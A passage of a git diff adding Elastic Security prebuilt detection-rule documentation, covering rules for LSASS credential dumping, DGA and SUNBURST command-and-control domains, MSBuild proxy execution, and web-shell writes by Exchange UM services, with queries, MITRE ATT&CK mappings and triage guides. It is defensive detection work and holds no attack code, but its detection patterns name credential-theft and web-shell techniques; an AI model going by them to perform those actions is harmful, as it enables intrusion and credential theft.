Files\\TDAgent\\ossec-agent\\ossec-agent.exe", + "?:\\Windows\\System32\\MRT.exe", + "?:\\Program Files\\Elastic\\Agent\\data\\elastic-agent-*\\components\\metricbeat.exe", + "?:\\Program Files\\Elastic\\Agent\\data\\elastic-agent-*\\components\\osqueryd.exe", + "?:\\Windows\\System32\\msiexec.exe", + "?:\\Program Files\\Common Files\\McAfee\\AVSolution\\mcshield.exe", + "?:\\Program Files\\Fortinet\\FortiClient\\FortiProxy.exe", + "?:\\Program Files\\LogicMonitor\\Agent\\bin\\sbshutdown.exe", + "?:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe", + "?:\\Program Files (x86)\\Blackpoint\\SnapAgent\\SnapAgent.exe", + "?:\\Program Files\\ESET\\ESET Security\\ekrn.exe", + "?:\\Program Files\\Huntress\\HuntressAgent.exe", + "?:\\Program Files (x86)\\eScan\\reload.exe", + "?:\\Program Files\\Topaz OFD\\Warsaw\\core.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc new file mode 100644 index 0000000000..2721a9b9e8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain]] +=== Machine Learning Detected a DNS Request Predicted to be a DGA Domain + +A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and not dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc new file mode 100644 index 0000000000..56e8e25762 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score]] +=== Machine Learning Detected a DNS Request With a High DGA Probability Score + +A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_probability > 0.98 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc new file mode 100644 index 0000000000..52cb827a3e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc @@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity]] +=== Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc new file mode 100644 index 0000000000..26849fb02e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc @@ -0,0 +1,79 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score]] +=== Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or +blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc new file mode 100644 index 0000000000..b44bc69b30 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain]] +=== Machine Learning Detected DGA activity using a known SUNBURST DNS domain + +A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: critical + +*Risk score*: 99 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc new file mode 100644 index 0000000000..57fcb903fb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc @@ -0,0 +1,85 @@ +[[prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process]] +=== Microsoft Build Engine Started an Unusual Process + +An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.category:process and event.type:start and process.parent.name:"MSBuild.exe" and +process.name.caseless:("csc.exe" or "iexplore.exe" or "powershell.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Sub-technique: +** Name: Compile After Delivery +** ID: T1027.004 +** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc new file mode 100644 index 0000000000..ba54e6d8f1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc @@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process]] +=== Microsoft Build Engine Started by a Script Process + +An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.category:process and event.type:start and ( + process.name.caseless:"msbuild.exe" or process.pe.original_file_name:"MSBuild.exe") and + process.parent.name:("cmd.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe" or "cscript.exe" or + "wscript.exe" or "mshta.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc new file mode 100644 index 0000000000..5ddce7a4a1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc @@ -0,0 +1,135 @@ +[[prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name]] +=== Microsoft Build Engine Using an Alternate Name + +An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Microsoft Build Engine Using an Alternate Name + +The OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections. + +The Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code. + +This rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name == "MSBuild.exe" and + not process.name : "MSBuild.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc new file mode 100644 index 0000000000..51dfa31da1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc @@ -0,0 +1,92 @@ +[[prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes]] +=== Microsoft Exchange Server UM Spawning Suspicious Processes + +Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers +* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("UMService.exe", "UMWorkerProcess.exe") and + not process.executable : + ("?:\\Windows\\System32\\werfault.exe", + "?:\\Windows\\System32\\wermgr.exe", + "?:\\Program Files\\Microsoft\\Exchange Server\\V??\\Bin\\UMWorkerProcess.exe", + "D:\\Exchange 2016\\Bin\\UMWorkerProcess.exe", + "E:\\ExchangeServer\\Bin\\UMWorkerProcess.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc new file mode 100644 index 0000000000..f88a0cc7fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc @@ -0,0 +1,104 @@ +[[prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files]] +=== Microsoft Exchange Server UM Writing Suspicious Files + +Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers +* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +Positive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines). + +Microsoft highly recommends that the best course of action is patching, but this may not protect already compromised systems +from existing intrusions. Other tools for detecting and mitigating can be found within their Exchange support +[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security) +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + process.name : ("UMWorkerProcess.exe", "umservice.exe") and + file.extension : ("php", "jsp", "js", "aspx", "asmx", "asax", "cfm", "shtml") and + ( + file.path : "?:\\inetpub\\wwwroot\\aspnet_client\\*" or + + (file.path : "?:\\*\\Microsoft\\Exchange Server*\\FrontEnd\\HttpProxy\\owa\\auth\\*" and + not (file.path : "?:\\*\\Microsoft\\Exchange Server*\\FrontEnd\\HttpProxy\\owa\\auth\\version\\*" or + file.name : ("errorFE.aspx", "expiredpassword.aspx", "frowny.aspx", "GetIdToken.htm", "logoff.aspx", + "logon.aspx", "OutlookCN.aspx", "RedirSuiteServiceProxy.aspx", "signout.aspx"))) or + + (file.path : "?:\\*\\Microsoft\\Exchange Server*\\FrontEnd\\HttpProxy\\ecp\\auth\\*" and + not file.name : "TimeoutLogoff.aspx") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** 